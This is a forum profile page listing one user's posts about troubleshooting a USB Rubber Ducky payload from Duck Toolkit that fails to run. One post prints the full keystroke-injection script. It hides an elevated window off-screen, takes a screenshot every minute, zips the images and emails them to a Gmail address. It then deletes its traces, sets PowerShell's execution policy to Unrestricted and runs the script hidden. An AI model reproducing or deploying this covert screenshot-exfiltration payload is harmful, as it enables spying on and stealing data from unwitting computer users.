Jump to content

duckyman662

Active Members
  • Posts

    9
  • Joined

  • Last visited

Posts posted by duckyman662

  1. Sounds like a timing / focus / payload issue.

    Follow some examples, the ducky will always type in the active window, sometimes timings are OS dependant , also payloads are usually OS dependant. Have you read the links in my signature? Read others posts in the forums - theres a lot of info there; could be information overload? start with the ducky guide and FAQs

    Start with a slightly longer delay between commands, and once a script has successfully run; reduce the timings to find the optimal payload speed.

    like any hacking device/ programming language practise,practise,practise.

    The duck is your friend.

    I did one from the ducky payload generator with the longest possible delay and it still does this..

  2. I get this error for just the screenshot with maximum delay selected from the duck toolkit website. 40000 united states, on my laptop. No idea why it doesnt work..

    edit: thread title says 32 bit vista. I also tried on two separate computers, around 2010 laptops and a macbook air, no luck.

    post-47338-0-56098200-1401165525_thumb.j

  3. 
    

    DELAY 2750

    GUI r

    DELAY 2750

    STRING powershell Start-Process notepad -Verb runAs

    ENTER

    DELAY 2750

    ALT y

    DELAY 2750

    ENTER

    ALT SPACE

    DELAY 2750

    STRING m

    DELAY 2750

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    ENTER

    STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss')

    ENTER

    STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime

    ENTER

    STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory

    ENTER

    STRING $date = get-date

    ENTER

    STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>"

    ENTER

    STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html'

    ENTER

    STRING $Report = $Report +"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>"

    ENTER

    STRING $jpegSaveDir = New-Item $fileSaveDir'/Screenshots' -ItemType Directory

    ENTER

    STRING $displayInfo = Get-WmiObject Win32_DesktopMonitor | Where {$_.Name -eq 'Default Monitor'}| Select ScreenHeight, ScreenWidth

    ENTER

    STRING $displayWidth = $displayInfo.ScreenWidth

    ENTER

    STRING $displayHeight = $displayInfo.ScreenHeight

    ENTER

    STRING [System.Reflection.Assembly]::LoadWithPartialName("System.Drawing")

    ENTER

    STRING $x = 0

    ENTER

    STRING do { Start-Sleep -Seconds 60

    ENTER

    STRING $jpegName = (get-date).ToString('HHmmss')

    ENTER

    STRING $image = new-object System.Drawing.Bitmap 1366 ,768

    ENTER

    STRING $imageSize = New-object System.Drawing.Size $displayWidth,$displayHeight

    ENTER

    STRING $screen = [System.Drawing.Graphics]::FromImage($image)

    ENTER

    STRING $screen.copyfromscreen(0,0,0,0, $imageSize,([System.Drawing.CopyPixelOperation]::SourceCopy))

    ENTER

    STRING $image.Save("$jpegSaveDir/$jpegName.jpeg",([system.drawing.imaging.imageformat]::jpeg));

    ENTER

    STRING $x++ } while ($x -ne 15);

    ENTER

    STRING $Report >> $fileSaveDir'/ComputerInfo.html'

    ENTER

    STRING function copy-ToZip($fileSaveDir){

    ENTER

    STRING $srcdir = $fileSaveDir

    ENTER

    STRING $zipFile = 'C:\Windows\Report.zip'

    ENTER

    STRING if(-not (test-path($zipFile))) {

    ENTER

    STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18))

    ENTER

    STRING (dir $zipFile).IsReadOnly = $false}

    ENTER

    STRING $shellApplication = new-object -com shell.application

    ENTER

    STRING $zipPackage = $shellApplication.NameSpace($zipFile)

    ENTER

    STRING $files = Get-ChildItem -Path $srcdir

    ENTER

    STRING foreach($file in $files) {

    ENTER

    STRING $zipPackage.CopyHere($file.FullName)

    ENTER

    STRING while($zipPackage.Items().Item($file.name) -eq $null){

    ENTER

    STRING Start-sleep -seconds 1 }}}

    ENTER

    STRING copy-ToZip($fileSaveDir)

    ENTER

    STRING $SMTPServer = 'smtp.gmail.com'

    ENTER

    STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)

    ENTER

    STRING $SMTPInfo.EnableSsl = $true

    ENTER

    STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential(''secret', 'secretpassword');

    ENTER

    STRING $ReportEmail = New-Object System.Net.Mail.MailMessage

    ENTER

    STRING $ReportEmail.From = ''secretemailhere@gmail.com''

    ENTER

    STRING $ReportEmail.To.Add('secretemailhere@gmail.com')

    ENTER

    STRING $ReportEmail.Subject = 'Duck Toolkit Recon Report'

    ENTER

    STRING $ReportEmail.Body = 'Please find attached your reconnaissance report.'

    ENTER

    STRING $ReportEmail.Attachments.Add('C:\Windows\Report.zip')

    ENTER

    STRING $SMTPInfo.Send($ReportEmail)

    ENTER

    STRING remove-item $fileSaveDir -recurse

    ENTER

    STRING remove-item 'C:\Windows\Report.zip'

    ENTER

    STRING Remove-Item $MyINvocation.InvocationName

    ENTER

    CTRL S

    DELAY 2750

    STRING C:\Windows\config-5077a.ps1

    ENTER

    DELAY 2750

    ALT F4

    DELAY 2750

    GUI r

    DELAY 2750

    STRING powershell Start-Process cmd -Verb runAs

    ENTER

    DELAY 2750

    ALT y

    DELAY 2750

    STRING mode con:cols=14 lines=1

    ENTER

    ALT SPACE

    DELAY 2750

    STRING m

    DELAY 2750

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    DOWNARROW

    ENTER

    STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false

    ENTER

    DELAY 2750

    STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1

    ENTER

  4. Hi sorry for the dely in my reply.

    So do you ever see notepad open and the script being typed out? If not I am thinking that the delay on the scripts may be too little and therfore the ducky is typing faster than the PC can handle. Let me know, I am working on a solution to this that should be released in a few weeks but there is a work around we can do in the mean time.

    411.

    The only payload that has worked is the Hello World payload, the rest will open random files and such.

  5. I created a payload through duck toolkit and I choose the e-mail options, I enter my information correctly and when I run the duck on the computer for some reason different payloads open random folders and I get no reports, I wanted screenshots sent to my e-mail several times but no luck, I tried creating different payloads but it wont work for some reason.

    I drag and drop the bin file onto the SD card, insert into the ducky and put the ducky into the usb potr, but it runs really quickly despite slower delays like 30 extra seconds, proper keyboard layout (USA) and it's not working, any advice?

×
×
  • Create New...